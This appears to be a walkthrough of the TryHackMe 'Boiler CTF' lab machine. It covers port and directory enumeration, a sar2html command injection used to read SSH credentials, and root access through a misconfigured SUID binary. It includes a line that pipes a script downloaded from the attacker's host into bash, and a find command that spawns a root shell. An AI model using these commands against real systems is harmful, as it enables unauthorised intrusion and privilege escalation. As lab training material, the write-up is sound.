Boiler CTF is a boot2root machine on TryHackMe. The room has the difficulty “Medium”. After enumerating for a while we find a vulnerability in a web application. This web application contains a command injection vulnerability, which we will utilize to read SSH credentials. After login into the machine with these credentials, there will be a “backup.sh” script inside the home folder. This home folder contains again some credentials. These credentials are then used to SSH again into the machine as another user. The final privilege escalation to root was done with a misconfigured SUID binary.
First of all we start with a Nmap scan. The initial scan will show us 3 open ports:
sudo nmap 10.10.120.184 -oN Nmap/initial
The next scan will scan for all ports. Here we will find out that four ports are actually open.
sudo nmap 10.10.120.184 -p- -oN Nmap/all
Another Nmap scan with scripts and service enumeration will give us more detail about the services which are running on the target.
sudo nmap 10.10.120.184 -p21,80,10000,55007 -sC -sV -O -T5 -oN Nmap/scripts
After that we can inspect the landing page of the web server on port 80. It is the default Apache 2 Ubuntu landing page.
We can now enumerate if there are any hidden directories. For this reason we will look if there is a “robots.txt” file. And indeed there is one.
All of these directories are just rabbit holes. But there are strange numbers inside the “robots.txt” file. Taking a closer look at these numbers, reveals that these are in the range of ASCII characters. So we can quickly use Python to decode the message:
text = “079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075”.split(“ “)tmp = ""
for i in text:
tmp += chr(int(i))
This string looks like base64 encoded. To decode this string we can use CyberChef.
The Hash that was outputted, seems like a MD5 hash. So we can use a site like Crackstation to crack that hash.
Crackstation will successfully crack it. But spoiler alert: This is also a rabbit hole.
Next we can enumerate the FTP service on port 21. Like the Nmap scan has outputted, it allows anonymous login. So connect to the FTP server via the following command.
Next we can log in with the username “anonymous” and a blank password. Listing the contents shows that there is a file called “.info.txt”. We can download this file.
Opening the file shows us a text that looks like a ROT13 encoded cipher.
We can easily decode it with CyberChef. But this is also just a Rabbit Hole.
Next we can look at the web service running on port 10000. Calling the URL https://10.10.120.184:10000/ will take us there. It is running Webmin. But we cannot exploit this service.
Next we have to start more enumeration. We will use
fuff to enumerate some directories of the web server on port 80. First of all run an enumeration attempt with the “directory-list-2.3-medium.txt” from SecLists. The following
fuff command will start the enumeration:
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.120.184/FUZZ
We will see that two directories exists: “/manual” and “/joomla”.
Next we will start further enumeration inside the “/joomla” page. With the same word list we can find the directory “_files”.
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.120.184/joomla/FUZZ — recursion — recursion-depth 1
This string is double encoded with Base64. But unfortunately it is also just a rabbit hole.
Finally ffuf will not find any other interesting files. So I started another enumeration attempt with another wordlist.
ffuf -w /usr/share/wordlists/dirb/common.txt:FUZZ -u http://10.10.120.184/joomla/FUZZ — recursion — recursion-depth 1 -e txt
This time I could find another directory. The directory is called “_test”.
It is running “sar2html”:
A quick Google Search for exploits showed that there is a command injection vulnerability for “sar2html 3.2.1”.
We will be using the vulnerability described at https://www.exploit-db.com/exploits/47204. We can inject commands into the “plot” parameter and will get the result as option inside the drop down menu of “Select Host”. With this knowledge we can try to inject the
whoami command to test if this web app is vulnerable.
And it works! So we can now list the contents of the directory. We will find an interesting file called “log.txt”.
We can also read this file with the
It contains an username and a password. We will try to use this to log into the machine via SSH. Remember that the SSH server is running on port 55007.
ssh -p 55007 firstname.lastname@example.org
After the SSH login we can spot a file called “backup.sh” inside the home folder of the
basterd user. We can also read this file. It contains the username “stoner” and his password.
We can now log in as “stoner” via SSH:
ssh -p 55007 email@example.com
We can now read the “.secret” file inside the home folder of the “stoner” user.
To find misconfiguration on the server, I will use Linpeas. I have downloaded it to my machine and serve a web server to transfer it to the victim. Run the following command inside the directory, where you have stored Linpeas.sh on your attacker machine:
python3 -m http.server
After that you can run the following command on the victim to download and run the script:
curl http://[VPN IP]:8000/linpeas.sh | bash
After waiting and analyzing the output I could spot a misconfigured SUID binary:
We can now spawn a root shell by running the following command:
find . -exec /bin/sh -p \; -quit
Finally we can read the root flag.
Never follow the principle security through obscurity. This will just make an attack take longer, but won’t prevent it. So the vulnerable “Sar2HTML” service should be updated. Furthermore credentials should not be stored in plain text. Also misconfiguration with the SUID bit should be avoided. As we can see in the output above,
stoner is inside the
lxd group. This group can also be abused escalate privileges to
stoner should be removed from the
lxd group if
stoner does not need access to that group.